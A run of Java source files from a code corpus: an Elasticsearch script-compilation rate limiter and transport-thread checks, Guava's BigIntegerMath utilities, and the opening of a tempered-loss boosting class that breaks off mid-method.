* enough water the request is denied. Just like a normal bucket, if water is added that overflows the bucket, the extra water/capacity
* is discarded - there can never be more water in the bucket than the size of the bucket.
*/
void checkCompilationLimit() {
if (rate.equals(UNLIMITED_COMPILATION_RATE)) {
return;
}
TokenBucketState tokenBucketState = this.tokenBucketState.updateAndGet(current -> {
long now = System.nanoTime();
long timePassed = now - current.lastInlineCompileTime;
double scriptsPerTimeWindow = current.availableTokens + (timePassed) * compilesAllowedPerNano;
// It's been over the time limit anyway, readjust the bucket to be level
if (scriptsPerTimeWindow > rate.count) {
scriptsPerTimeWindow = rate.count;
}
// If there is enough tokens in the bucket, allow the request and decrease the tokens by 1
if (scriptsPerTimeWindow >= 1) {
scriptsPerTimeWindow -= 1.0;
return new TokenBucketState(now, scriptsPerTimeWindow, true);
} else {
return new TokenBucketState(now, scriptsPerTimeWindow, false);
}
});
if (tokenBucketState.tokenSuccessfullyTaken == false) {
scriptMetrics.onCompilationLimit();
// Otherwise reject the request
throw new CircuitBreakingException(
"[script] Too many dynamic script compilations within, max: ["
+ rate
+ "]; please use indexed, or scripts with parameters instead; "
+ "this limit can be changed by the ["
+ contextRateSetting
+ "] setting",
CircuitBreaker.Durability.TRANSIENT
);
}
}
/**
* A small listener for the script cache that calls each
* {@code ScriptEngine}'s {@code scriptRemoved} method when the
* script has been removed from the cache
*/
private class ScriptCacheRemovalListener implements RemovalListener<CacheKey, Object> {
@Override
public void onRemoval(RemovalNotification<CacheKey, Object> notification) {
if (logger.isDebugEnabled()) {
logger.debug("removed [{}] from cache, reason: [{}]", notification.getValue(), notification.getRemovalReason());
}
scriptMetrics.onCacheEviction();
}
}
private static final class CacheKey {
final String lang;
final String idOrCode;
final String context;
final Map<String, String> options;
private CacheKey(String lang, String idOrCode, String context, Map<String, String> options) {
this.lang = lang;
this.idOrCode = idOrCode;
this.context = context;
this.options = options;
}
@Override
public boolean equals(Object o) {
if (this == o) return true;
if (o == null || getClass() != o.getClass()) return false;
CacheKey cacheKey = (CacheKey) o;
return Objects.equals(lang, cacheKey.lang)
&& Objects.equals(idOrCode, cacheKey.idOrCode)
&& Objects.equals(context, cacheKey.context)
&& Objects.equals(options, cacheKey.options);
}
@Override
public int hashCode() {
return Objects.hash(lang, idOrCode, context, options);
}
}
static class TokenBucketState {
public final long lastInlineCompileTime;
public final double availableTokens;
public final boolean tokenSuccessfullyTaken;
private TokenBucketState(double availableTokens) {
this(System.nanoTime(), availableTokens, false);
}
private TokenBucketState(long lastInlineCompileTime, double availableTokens, boolean tokenSuccessfullyTaken) {
this.lastInlineCompileTime = lastInlineCompileTime;
this.availableTokens = availableTokens;
this.tokenSuccessfullyTaken = tokenSuccessfullyTaken;
}
}
public static class CompilationRate {
public final int count;
public final TimeValue time;
private final String source;
public CompilationRate(Integer count, TimeValue time) {
this.count = count;
this.time = time;
this.source = null;
}
public CompilationRate(Tuple<Integer, TimeValue> rate) {
this(rate.v1(), rate.v2());
}
/**
* Parses a string as a non-negative int count and a {@code TimeValue} as arguments split by a slash
*/
public CompilationRate(String value) {
if (value.contains("/") == false || value.startsWith("/") || value.endsWith("/")) {
throw new IllegalArgumentException(
"parameter must contain a positive integer and a timevalue, i.e. 10/1m, but was [" + value + "]"
);
}
int idx = value.indexOf('/');
String count = value.substring(0, idx);
String time = value.substring(idx + 1);
try {
int rate = Integer.parseInt(count);
if (rate < 0) {
throw new IllegalArgumentException("rate [" + rate + "] must be positive");
}
TimeValue timeValue = TimeValue.parseTimeValue(time, "script.max_compilations_rate");
if (timeValue.nanos() <= 0) {
throw new IllegalArgumentException("time value [" + time + "] must be positive");
}
// protect against a too hard to check limit, like less than a minute
if (timeValue.seconds() < 60) {
throw new IllegalArgumentException("time value [" + time + "] must be at least on a one minute resolution");
}
this.count = rate;
this.time = timeValue;
this.source = value;
} catch (NumberFormatException e) {
// the number format exception message is so confusing, that it makes more sense to wrap it with a useful one
throw new IllegalArgumentException("could not parse [" + count + "] as integer in value [" + value + "]", e);
}
}
public Tuple<Integer, TimeValue> asTuple() {
return new Tuple<>(this.count, this.time);
}
@Override
public String toString() {
return source != null ? source : count + "/" + time.toHumanReadableString(0);
}
@Override
public boolean equals(Object o) {
if (this == o) return true;
if (o == null || getClass() != o.getClass()) return false;
CompilationRate that = (CompilationRate) o;
return count == that.count && Objects.equals(time, that.time);
}
@Override
public int hashCode() {
return Objects.hash(count, time);
}
}
}
| elastic/elasticsearch | server/src/main/java/org/elasticsearch/script/ScriptCache.java |
1,130 | /*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the Elastic License
* 2.0 and the Server Side Public License, v 1; you may not use this file except
* in compliance with, at your election, the Elastic License 2.0 or the Server
* Side Public License, v 1.
*/
package org.elasticsearch.transport;
import org.elasticsearch.common.util.concurrent.ThreadContext;
import org.elasticsearch.http.HttpServerTransport;
import org.elasticsearch.tasks.Task;
import java.util.Set;
public enum Transports {
;
private static final Set<String> REQUEST_HEADERS_ALLOWED_ON_DEFAULT_THREAD_CONTEXT = Set.of(
Task.TRACE_ID,
Task.TRACE_PARENT,
Task.X_OPAQUE_ID_HTTP_HEADER,
Task.X_ELASTIC_PRODUCT_ORIGIN_HTTP_HEADER
);
/** threads whose name is prefixed by this string will be considered network threads, even though they aren't */
public static final String TEST_MOCK_TRANSPORT_THREAD_PREFIX = "__mock_network_thread";
private static final String[] TRANSPORT_THREAD_NAMES = new String[] {
'[' + HttpServerTransport.HTTP_SERVER_WORKER_THREAD_NAME_PREFIX + ']',
'[' + TcpTransport.TRANSPORT_WORKER_THREAD_NAME_PREFIX + ']',
TEST_MOCK_TRANSPORT_THREAD_PREFIX };
/**
* Utility method to detect whether a thread is a network thread. Typically
* used in assertions to make sure that we do not call blocking code from
* networking threads.
*/
public static boolean isTransportThread(Thread t) {
return isTransportThread(t.getName());
}
/**
* Utility method to detect whether a thread is a network thread. Typically
* used in assertions to make sure that we do not call blocking code from
* networking threads.
* @param threadName the name of the thread
*/
public static boolean isTransportThread(String threadName) {
for (String s : TRANSPORT_THREAD_NAMES) {
if (threadName.contains(s)) {
return true;
}
}
return false;
}
public static boolean assertTransportThread() {
final Thread t = Thread.currentThread();
assert isTransportThread(t) : "Expected transport thread but got [" + t + "]";
return true;
}
public static boolean assertNotTransportThread(String reason) {
final Thread t = Thread.currentThread();
assert isTransportThread(t) == false : "Expected current thread [" + t + "] to not be a transport thread. Reason: [" + reason + "]";
return true;
}
public static boolean assertDefaultThreadContext(ThreadContext threadContext) {
assert threadContext.getRequestHeadersOnly().isEmpty()
|| REQUEST_HEADERS_ALLOWED_ON_DEFAULT_THREAD_CONTEXT.containsAll(threadContext.getRequestHeadersOnly().keySet())
: "expected empty context but was " + threadContext.getRequestHeadersOnly() + " on " + Thread.currentThread().getName();
return true;
}
}
| elastic/elasticsearch | server/src/main/java/org/elasticsearch/transport/Transports.java |
1,131 | /*
* Copyright (C) 2011 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
package com.google.common.math;
import static com.google.common.base.Preconditions.checkArgument;
import static com.google.common.base.Preconditions.checkNotNull;
import static com.google.common.math.MathPreconditions.checkNonNegative;
import static com.google.common.math.MathPreconditions.checkPositive;
import static com.google.common.math.MathPreconditions.checkRoundingUnnecessary;
import static java.math.RoundingMode.CEILING;
import static java.math.RoundingMode.FLOOR;
import static java.math.RoundingMode.HALF_EVEN;
import com.google.common.annotations.GwtCompatible;
import com.google.common.annotations.GwtIncompatible;
import com.google.common.annotations.VisibleForTesting;
import java.math.BigDecimal;
import java.math.BigInteger;
import java.math.RoundingMode;
import java.util.ArrayList;
import java.util.List;
/**
* A class for arithmetic on values of type {@code BigInteger}.
*
* <p>The implementations of many methods in this class are based on material from Henry S. Warren,
* Jr.'s <i>Hacker's Delight</i>, (Addison Wesley, 2002).
*
* <p>Similar functionality for {@code int} and for {@code long} can be found in {@link IntMath} and
* {@link LongMath} respectively.
*
* @author Louis Wasserman
* @since 11.0
*/
@GwtCompatible(emulated = true)
@ElementTypesAreNonnullByDefault
public final class BigIntegerMath {
/**
* Returns the smallest power of two greater than or equal to {@code x}. This is equivalent to
* {@code BigInteger.valueOf(2).pow(log2(x, CEILING))}.
*
* @throws IllegalArgumentException if {@code x <= 0}
* @since 20.0
*/
public static BigInteger ceilingPowerOfTwo(BigInteger x) {
return BigInteger.ZERO.setBit(log2(x, CEILING));
}
/**
* Returns the largest power of two less than or equal to {@code x}. This is equivalent to {@code
* BigInteger.valueOf(2).pow(log2(x, FLOOR))}.
*
* @throws IllegalArgumentException if {@code x <= 0}
* @since 20.0
*/
public static BigInteger floorPowerOfTwo(BigInteger x) {
return BigInteger.ZERO.setBit(log2(x, FLOOR));
}
/** Returns {@code true} if {@code x} represents a power of two. */
public static boolean isPowerOfTwo(BigInteger x) {
checkNotNull(x);
return x.signum() > 0 && x.getLowestSetBit() == x.bitLength() - 1;
}
/**
* Returns the base-2 logarithm of {@code x}, rounded according to the specified rounding mode.
*
* @throws IllegalArgumentException if {@code x <= 0}
* @throws ArithmeticException if {@code mode} is {@link RoundingMode#UNNECESSARY} and {@code x}
* is not a power of two
*/
@SuppressWarnings("fallthrough")
// TODO(kevinb): remove after this warning is disabled globally
public static int log2(BigInteger x, RoundingMode mode) {
checkPositive("x", checkNotNull(x));
int logFloor = x.bitLength() - 1;
switch (mode) {
case UNNECESSARY:
checkRoundingUnnecessary(isPowerOfTwo(x)); // fall through
case DOWN:
case FLOOR:
return logFloor;
case UP:
case CEILING:
return isPowerOfTwo(x) ? logFloor : logFloor + 1;
case HALF_DOWN:
case HALF_UP:
case HALF_EVEN:
if (logFloor < SQRT2_PRECOMPUTE_THRESHOLD) {
BigInteger halfPower =
SQRT2_PRECOMPUTED_BITS.shiftRight(SQRT2_PRECOMPUTE_THRESHOLD - logFloor);
if (x.compareTo(halfPower) <= 0) {
return logFloor;
} else {
return logFloor + 1;
}
}
// Since sqrt(2) is irrational, log2(x) - logFloor cannot be exactly 0.5
//
// To determine which side of logFloor.5 the logarithm is,
// we compare x^2 to 2^(2 * logFloor + 1).
BigInteger x2 = x.pow(2);
int logX2Floor = x2.bitLength() - 1;
return (logX2Floor < 2 * logFloor + 1) ? logFloor : logFloor + 1;
default:
throw new AssertionError();
}
}
/*
* The maximum number of bits in a square root for which we'll precompute an explicit half power
* of two. This can be any value, but higher values incur more class load time and linearly
* increasing memory consumption.
*/
@VisibleForTesting static final int SQRT2_PRECOMPUTE_THRESHOLD = 256;
@VisibleForTesting
static final BigInteger SQRT2_PRECOMPUTED_BITS =
new BigInteger("16a09e667f3bcc908b2fb1366ea957d3e3adec17512775099da2f590b0667322a", 16);
/**
* Returns the base-10 logarithm of {@code x}, rounded according to the specified rounding mode.
*
* @throws IllegalArgumentException if {@code x <= 0}
* @throws ArithmeticException if {@code mode} is {@link RoundingMode#UNNECESSARY} and {@code x}
* is not a power of ten
*/
@GwtIncompatible // TODO
@SuppressWarnings("fallthrough")
public static int log10(BigInteger x, RoundingMode mode) {
checkPositive("x", x);
if (fitsInLong(x)) {
return LongMath.log10(x.longValue(), mode);
}
int approxLog10 = (int) (log2(x, FLOOR) * LN_2 / LN_10);
BigInteger approxPow = BigInteger.TEN.pow(approxLog10);
int approxCmp = approxPow.compareTo(x);
/*
* We adjust approxLog10 and approxPow until they're equal to floor(log10(x)) and
* 10^floor(log10(x)).
*/
if (approxCmp > 0) {
/*
* The code is written so that even completely incorrect approximations will still yield the
* correct answer eventually, but in practice this branch should almost never be entered, and
* even then the loop should not run more than once.
*/
do {
approxLog10--;
approxPow = approxPow.divide(BigInteger.TEN);
approxCmp = approxPow.compareTo(x);
} while (approxCmp > 0);
} else {
BigInteger nextPow = BigInteger.TEN.multiply(approxPow);
int nextCmp = nextPow.compareTo(x);
while (nextCmp <= 0) {
approxLog10++;
approxPow = nextPow;
approxCmp = nextCmp;
nextPow = BigInteger.TEN.multiply(approxPow);
nextCmp = nextPow.compareTo(x);
}
}
int floorLog = approxLog10;
BigInteger floorPow = approxPow;
int floorCmp = approxCmp;
switch (mode) {
case UNNECESSARY:
checkRoundingUnnecessary(floorCmp == 0);
// fall through
case FLOOR:
case DOWN:
return floorLog;
case CEILING:
case UP:
return floorPow.equals(x) ? floorLog : floorLog + 1;
case HALF_DOWN:
case HALF_UP:
case HALF_EVEN:
// Since sqrt(10) is irrational, log10(x) - floorLog can never be exactly 0.5
BigInteger x2 = x.pow(2);
BigInteger halfPowerSquared = floorPow.pow(2).multiply(BigInteger.TEN);
return (x2.compareTo(halfPowerSquared) <= 0) ? floorLog : floorLog + 1;
default:
throw new AssertionError();
}
}
private static final double LN_10 = Math.log(10);
private static final double LN_2 = Math.log(2);
/**
* Returns the square root of {@code x}, rounded with the specified rounding mode.
*
* @throws IllegalArgumentException if {@code x < 0}
* @throws ArithmeticException if {@code mode} is {@link RoundingMode#UNNECESSARY} and {@code
* sqrt(x)} is not an integer
*/
@GwtIncompatible // TODO
@SuppressWarnings("fallthrough")
public static BigInteger sqrt(BigInteger x, RoundingMode mode) {
checkNonNegative("x", x);
if (fitsInLong(x)) {
return BigInteger.valueOf(LongMath.sqrt(x.longValue(), mode));
}
BigInteger sqrtFloor = sqrtFloor(x);
switch (mode) {
case UNNECESSARY:
checkRoundingUnnecessary(sqrtFloor.pow(2).equals(x)); // fall through
case FLOOR:
case DOWN:
return sqrtFloor;
case CEILING:
case UP:
int sqrtFloorInt = sqrtFloor.intValue();
boolean sqrtFloorIsExact =
(sqrtFloorInt * sqrtFloorInt == x.intValue()) // fast check mod 2^32
&& sqrtFloor.pow(2).equals(x); // slow exact check
return sqrtFloorIsExact ? sqrtFloor : sqrtFloor.add(BigInteger.ONE);
case HALF_DOWN:
case HALF_UP:
case HALF_EVEN:
BigInteger halfSquare = sqrtFloor.pow(2).add(sqrtFloor);
/*
* We wish to test whether or not x <= (sqrtFloor + 0.5)^2 = halfSquare + 0.25. Since both x
* and halfSquare are integers, this is equivalent to testing whether or not x <=
* halfSquare.
*/
return (halfSquare.compareTo(x) >= 0) ? sqrtFloor : sqrtFloor.add(BigInteger.ONE);
default:
throw new AssertionError();
}
}
@GwtIncompatible // TODO
private static BigInteger sqrtFloor(BigInteger x) {
/*
* Adapted from Hacker's Delight, Figure 11-1.
*
* Using DoubleUtils.bigToDouble, getting a double approximation of x is extremely fast, and
* then we can get a double approximation of the square root. Then, we iteratively improve this
* guess with an application of Newton's method, which sets guess := (guess + (x / guess)) / 2.
* This iteration has the following two properties:
*
* a) every iteration (except potentially the first) has guess >= floor(sqrt(x)). This is
* because guess' is the arithmetic mean of guess and x / guess, sqrt(x) is the geometric mean,
* and the arithmetic mean is always higher than the geometric mean.
*
* b) this iteration converges to floor(sqrt(x)). In fact, the number of correct digits doubles
* with each iteration, so this algorithm takes O(log(digits)) iterations.
*
* We start out with a double-precision approximation, which may be higher or lower than the
* true value. Therefore, we perform at least one Newton iteration to get a guess that's
* definitely >= floor(sqrt(x)), and then continue the iteration until we reach a fixed point.
*/
BigInteger sqrt0;
int log2 = log2(x, FLOOR);
if (log2 < Double.MAX_EXPONENT) {
sqrt0 = sqrtApproxWithDoubles(x);
} else {
int shift = (log2 - DoubleUtils.SIGNIFICAND_BITS) & ~1; // even!
/*
* We have that x / 2^shift < 2^54. Our initial approximation to sqrtFloor(x) will be
* 2^(shift/2) * sqrtApproxWithDoubles(x / 2^shift).
*/
sqrt0 = sqrtApproxWithDoubles(x.shiftRight(shift)).shiftLeft(shift >> 1);
}
BigInteger sqrt1 = sqrt0.add(x.divide(sqrt0)).shiftRight(1);
if (sqrt0.equals(sqrt1)) {
return sqrt0;
}
do {
sqrt0 = sqrt1;
sqrt1 = sqrt0.add(x.divide(sqrt0)).shiftRight(1);
} while (sqrt1.compareTo(sqrt0) < 0);
return sqrt0;
}
@GwtIncompatible // TODO
private static BigInteger sqrtApproxWithDoubles(BigInteger x) {
return DoubleMath.roundToBigInteger(Math.sqrt(DoubleUtils.bigToDouble(x)), HALF_EVEN);
}
/**
* Returns {@code x}, rounded to a {@code double} with the specified rounding mode. If {@code x}
* is precisely representable as a {@code double}, its {@code double} value will be returned;
* otherwise, the rounding will choose between the two nearest representable values with {@code
* mode}.
*
* <p>For the case of {@link RoundingMode#HALF_DOWN}, {@code HALF_UP}, and {@code HALF_EVEN},
* infinite {@code double} values are considered infinitely far away. For example, 2^2000 is not
* representable as a double, but {@code roundToDouble(BigInteger.valueOf(2).pow(2000), HALF_UP)}
* will return {@code Double.MAX_VALUE}, not {@code Double.POSITIVE_INFINITY}.
*
* <p>For the case of {@link RoundingMode#HALF_EVEN}, this implementation uses the IEEE 754
* default rounding mode: if the two nearest representable values are equally near, the one with
* the least significant bit zero is chosen. (In such cases, both of the nearest representable
* values are even integers; this method returns the one that is a multiple of a greater power of
* two.)
*
* @throws ArithmeticException if {@code mode} is {@link RoundingMode#UNNECESSARY} and {@code x}
* is not precisely representable as a {@code double}
* @since 30.0
*/
@GwtIncompatible
public static double roundToDouble(BigInteger x, RoundingMode mode) {
return BigIntegerToDoubleRounder.INSTANCE.roundToDouble(x, mode);
}
@GwtIncompatible
private static class BigIntegerToDoubleRounder extends ToDoubleRounder<BigInteger> {
static final BigIntegerToDoubleRounder INSTANCE = new BigIntegerToDoubleRounder();
private BigIntegerToDoubleRounder() {}
@Override
double roundToDoubleArbitrarily(BigInteger bigInteger) {
return DoubleUtils.bigToDouble(bigInteger);
}
@Override
int sign(BigInteger bigInteger) {
return bigInteger.signum();
}
@Override
BigInteger toX(double d, RoundingMode mode) {
return DoubleMath.roundToBigInteger(d, mode);
}
@Override
BigInteger minus(BigInteger a, BigInteger b) {
return a.subtract(b);
}
}
/**
* Returns the result of dividing {@code p} by {@code q}, rounding using the specified {@code
* RoundingMode}.
*
* @throws ArithmeticException if {@code q == 0}, or if {@code mode == UNNECESSARY} and {@code a}
* is not an integer multiple of {@code b}
*/
@GwtIncompatible // TODO
public static BigInteger divide(BigInteger p, BigInteger q, RoundingMode mode) {
BigDecimal pDec = new BigDecimal(p);
BigDecimal qDec = new BigDecimal(q);
return pDec.divide(qDec, 0, mode).toBigIntegerExact();
}
/**
* Returns {@code n!}, that is, the product of the first {@code n} positive integers, or {@code 1}
* if {@code n == 0}.
*
* <p><b>Warning:</b> the result takes <i>O(n log n)</i> space, so use cautiously.
*
* <p>This uses an efficient binary recursive algorithm to compute the factorial with balanced
* multiplies. It also removes all the 2s from the intermediate products (shifting them back in at
* the end).
*
* @throws IllegalArgumentException if {@code n < 0}
*/
public static BigInteger factorial(int n) {
checkNonNegative("n", n);
// If the factorial is small enough, just use LongMath to do it.
if (n < LongMath.factorials.length) {
return BigInteger.valueOf(LongMath.factorials[n]);
}
// Pre-allocate space for our list of intermediate BigIntegers.
int approxSize = IntMath.divide(n * IntMath.log2(n, CEILING), Long.SIZE, CEILING);
ArrayList<BigInteger> bignums = new ArrayList<>(approxSize);
// Start from the pre-computed maximum long factorial.
int startingNumber = LongMath.factorials.length;
long product = LongMath.factorials[startingNumber - 1];
// Strip off 2s from this value.
int shift = Long.numberOfTrailingZeros(product);
product >>= shift;
// Use floor(log2(num)) + 1 to prevent overflow of multiplication.
int productBits = LongMath.log2(product, FLOOR) + 1;
int bits = LongMath.log2(startingNumber, FLOOR) + 1;
// Check for the next power of two boundary, to save us a CLZ operation.
int nextPowerOfTwo = 1 << (bits - 1);
// Iteratively multiply the longs as big as they can go.
for (long num = startingNumber; num <= n; num++) {
// Check to see if the floor(log2(num)) + 1 has changed.
if ((num & nextPowerOfTwo) != 0) {
nextPowerOfTwo <<= 1;
bits++;
}
// Get rid of the 2s in num.
int tz = Long.numberOfTrailingZeros(num);
long normalizedNum = num >> tz;
shift += tz;
// Adjust floor(log2(num)) + 1.
int normalizedBits = bits - tz;
// If it won't fit in a long, then we store off the intermediate product.
if (normalizedBits + productBits >= Long.SIZE) {
bignums.add(BigInteger.valueOf(product));
product = 1;
productBits = 0;
}
product *= normalizedNum;
productBits = LongMath.log2(product, FLOOR) + 1;
}
// Check for leftovers.
if (product > 1) {
bignums.add(BigInteger.valueOf(product));
}
// Efficiently multiply all the intermediate products together.
return listProduct(bignums).shiftLeft(shift);
}
static BigInteger listProduct(List<BigInteger> nums) {
return listProduct(nums, 0, nums.size());
}
static BigInteger listProduct(List<BigInteger> nums, int start, int end) {
switch (end - start) {
case 0:
return BigInteger.ONE;
case 1:
return nums.get(start);
case 2:
return nums.get(start).multiply(nums.get(start + 1));
case 3:
return nums.get(start).multiply(nums.get(start + 1)).multiply(nums.get(start + 2));
default:
// Otherwise, split the list in half and recursively do this.
int m = (end + start) >>> 1;
return listProduct(nums, start, m).multiply(listProduct(nums, m, end));
}
}
/**
* Returns {@code n} choose {@code k}, also known as the binomial coefficient of {@code n} and
* {@code k}, that is, {@code n! / (k! (n - k)!)}.
*
* <p><b>Warning:</b> the result can take as much as <i>O(k log n)</i> space.
*
* @throws IllegalArgumentException if {@code n < 0}, {@code k < 0}, or {@code k > n}
*/
public static BigInteger binomial(int n, int k) {
checkNonNegative("n", n);
checkNonNegative("k", k);
checkArgument(k <= n, "k (%s) > n (%s)", k, n);
if (k > (n >> 1)) {
k = n - k;
}
if (k < LongMath.biggestBinomials.length && n <= LongMath.biggestBinomials[k]) {
return BigInteger.valueOf(LongMath.binomial(n, k));
}
BigInteger accum = BigInteger.ONE;
long numeratorAccum = n;
long denominatorAccum = 1;
int bits = LongMath.log2(n, CEILING);
int numeratorBits = bits;
for (int i = 1; i < k; i++) {
int p = n - i;
int q = i + 1;
// log2(p) >= bits - 1, because p >= n/2
if (numeratorBits + bits >= Long.SIZE - 1) {
// The numerator is as big as it can get without risking overflow.
// Multiply numeratorAccum / denominatorAccum into accum.
accum =
accum
.multiply(BigInteger.valueOf(numeratorAccum))
.divide(BigInteger.valueOf(denominatorAccum));
numeratorAccum = p;
denominatorAccum = q;
numeratorBits = bits;
} else {
// We can definitely multiply into the long accumulators without overflowing them.
numeratorAccum *= p;
denominatorAccum *= q;
numeratorBits += bits;
}
}
return accum
.multiply(BigInteger.valueOf(numeratorAccum))
.divide(BigInteger.valueOf(denominatorAccum));
}
// Returns true if BigInteger.valueOf(x.longValue()).equals(x).
@GwtIncompatible // TODO
static boolean fitsInLong(BigInteger x) {
return x.bitLength() <= Long.SIZE - 1;
}
private BigIntegerMath() {}
}
| google/guava | android/guava/src/com/google/common/math/BigIntegerMath.java |
1,134 | import java.io.*;
import java.util.*;
public class Boost implements Debuggable {
public static int ITER_STOP;
public static String KEY_NAME_TEMPERED_LOSS = "@TemperedLoss", KEY_NAME_LOG_LOSS = "@LogLoss";
public static String[] KEY_NAME = {KEY_NAME_TEMPERED_LOSS, KEY_NAME_LOG_LOSS};
public static String[] KEY_NAME_DISPLAY = {"TemperedLoss", "LogLoss"};
public static double MAX_PRED_VALUE = 100.0;
public static int MAX_SPLIT_TEST = 2000;
public static double COEFF_GRAD = 0.001;
public static double START_T = 0.9;
public static String METHOD_NAME(String s) {
int i = 0;
do {
if (KEY_NAME[i].equals(s)) return KEY_NAME_DISPLAY[i];
i++;
} while (i < KEY_NAME.length);
Dataset.perror("Boost.class :: no keyword " + s);
return "";
}
public static void CHECK_NAME(String s) {
int i = 0;
do {
if (KEY_NAME[i].equals(s)) return;
i++;
} while (i < KEY_NAME.length);
Dataset.perror("Boost.class :: no keyword " + s);
}
Domain myDomain;
int max_number_tree, max_size_tree;
double average_number_leaves, average_depth, tempered_t, next_t, grad_Z;
boolean adaptive_t = false;
String name, clamping;
DecisionTree[] allTrees;
DecisionTree[][] recordAllTrees;
double[] allLeveragingCoefficients;
MonotonicTreeGraph[][] recordAllMonotonicTreeGraphs_boosting_weights;
MonotonicTreeGraph[][] recordAllMonotonicTreeGraphs_cardinals;
double[] z_tilde;
Boost(Domain d, String nn, int maxnt, int maxst, double tt, String clamped) {
myDomain = d;
name = nn;
clamping = clamped;
Boost.CHECK_NAME(name);
max_number_tree = maxnt;
max_size_tree = maxst;
if (tt == -1.0) {
adaptive_t = true;
tempered_t = START_T;
} else tempered_t = tt;
if (!name.equals(Boost.KEY_NAME_TEMPERED_LOSS)) tempered_t = 1.0; // not the tempered loss
allTrees = null;
recordAllMonotonicTreeGraphs_boosting_weights = recordAllMonotonicTreeGraphs_cardinals = null;
allLeveragingCoefficients = z_tilde = null;
average_number_leaves = average_depth = 0.0;
recordAllTrees = new DecisionTree[NUMBER_STRATIFIED_CV][];
recordAllMonotonicTreeGraphs_boosting_weights = new MonotonicTreeGraph[NUMBER_STRATIFIED_CV][];
recordAllMonotonicTreeGraphs_cardinals = new MonotonicTreeGraph[NUMBER_STRATIFIED_CV][];
grad_Z = -1.0;
}
public String fullName() {
String ret = Boost.METHOD_NAME(name);
ret +=
"["
+ max_number_tree
+ "("
+ max_size_tree
+ "):"
+ ((clamping.equals(Algorithm.CLAMPED)) ? "1" : "0")
+ "]";
if (!adaptive_t) ret += "{" + tempered_t + "}";
else ret += "{" + -1.0 + "}";
return ret;
}
public Vector boost(int index_algo) {
Vector v = new Vector(), v_cur = null;
Vector<DecisionTree> all_trees;
Vector<Double> all_leveraging_coefficients;
Vector<Double> all_zs;
Vector<Double> sequence_empirical_risks = new Vector<>();
Vector<Double> sequence_true_risks = new Vector<>();
Vector<Double> sequence_empirical_risks_MonotonicTreeGraph = new Vector<>();
Vector<Double> sequence_true_risks_MonotonicTreeGraph = new Vector<>();
Vector<Double> sequence_min_codensity = new Vector<>();
Vector<Double> sequence_max_codensity = new Vector<>();
// contain the errors on the tree set BUILT UP TO THE INDEX
Vector<Integer> sequence_cardinal_nodes = new Vector<>();
Vector<Vector<Double>> sequence_sequence_empirical_risks = new Vector<>();
Vector<Vector<Double>> sequence_sequence_true_risks = new Vector<>();
Vector<Vector<Double>> sequence_sequence_empirical_risks_MonotonicTreeGraph = new Vector<>();
Vector<Vector<Double>> sequence_sequence_true_risks_MonotonicTreeGraph = new Vector<>();
Vector<Vector<Double>> sequence_sequence_min_codensity = new Vector<>();
Vector<Vector<Double>> sequence_sequence_max_codensity = new Vector<>();
DecisionTree dt;
int i, j, curcard = 0;
double leveraging_mu, leveraging_alpha, expected_edge, curerr, opterr, ser_mtg, str_mtg;
double err_fin,
err_fin_MonotonicTreeGraph,
err_best,
perr_fin,
perr_fin_MonotonicTreeGraph,
perr_best;
int card_nodes_fin, card_nodes_best, trees_fin, trees_best;
double[] min_codensity = new double[max_number_tree];
double[] max_codensity = new double[max_number_tree];
System.out.println(fullName() + " (eta = " + myDomain.myDS.eta_noise + ")");
for (i = 0; i < NUMBER_STRATIFIED_CV; i++) {
all_trees = new Vector<>();
all_leveraging_coefficients = new Vector<>();
all_zs = new Vector<>();
recordAllTrees[i] = new DecisionTree[max_number_tree];
if (adaptive_t) tempered_t = Boost.START_T;
TemperedBoostException.RESET_COUNTS();
allTrees = null;
allLeveragingCoefficients = null;
System.out.print("> Fold " + (i + 1) + "/" + NUMBER_STRATIFIED_CV + " -- ");
myDomain.myDS.init_weights(name, i, tempered_t);
v_cur = new Vector();
// saves in this order:
//
// COMPLETE SUBSET OF TREES: err = empirical risk on fold
// COMPLETE SUBSET OF TREES: perr = estimated true risk on fold
// COMPLETE SUBSET OF TREES: tree number
// COMPLETE SUBSET OF TREES: tree size (total card of all nodes)
sequence_empirical_risks = new Vector();
sequence_true_risks = new Vector();
sequence_empirical_risks_MonotonicTreeGraph = new Vector();
sequence_true_risks_MonotonicTreeGraph = new Vector();
sequence_min_codensity = new Vector();
sequence_max_codensity = new Vector();
sequence_cardinal_nodes = new Vector();
min_codensity = new double[max_number_tree];
for (j = 0; j < max_number_tree; j++) {
System.out.print(".");
v_cur = new Vector();
dt = oneTree(j, i);
leveraging_mu = dt.leveraging_mu(); // leveraging coefficient
curcard += dt.number_nodes;
average_number_leaves += (double) dt.leaves.size();
average_depth += (double) dt.depth;
all_trees.addElement(dt);
leveraging_alpha = dt.leveraging_alpha(leveraging_mu, all_zs);
all_leveraging_coefficients.addElement(new Double(leveraging_alpha));
if ((SAVE_PARAMETERS_DURING_TRAINING) || (j == max_number_tree - 1)) {
sequence_empirical_risks.addElement(
new Double(
ensemble_error_noise_free(
all_trees, all_leveraging_coefficients, true, i, false)));
sequence_true_risks.addElement(
new Double(
ensemble_error_noise_free(
all_trees, all_leveraging_coefficients, false, i, false)));
ser_mtg =
ensemble_error_noise_free(all_trees, all_leveraging_coefficients, true, i, true);
sequence_empirical_risks_MonotonicTreeGraph.addElement(new Double(ser_mtg));
str_mtg =
ensemble_error_noise_free(all_trees, all_leveraging_coefficients, false, i, true);
sequence_true_risks_MonotonicTreeGraph.addElement(new Double(str_mtg));
sequence_cardinal_nodes.addElement(new Integer(curcard));
}
if ((adaptive_t) && (j > 0))
tempered_t = next_t; // change here otherwise inconsistencies in computations
if (name.equals(Boost.KEY_NAME_TEMPERED_LOSS)) {
try {
reweight_examples_tempered_loss(
dt, leveraging_mu, i, all_zs, j, min_codensity, max_codensity);
} catch (TemperedBoostException eee) {
min_codensity[j] = -1.0;
max_codensity[j] = -1.0;
reweight_examples_infinite_weight(dt, leveraging_mu, i, all_zs);
}
} else if (name.equals(Boost.KEY_NAME_LOG_LOSS)) {
reweight_examples_log_loss(dt, leveraging_mu, i);
} else Dataset.perror("Boost.class :: no such loss as " + name);
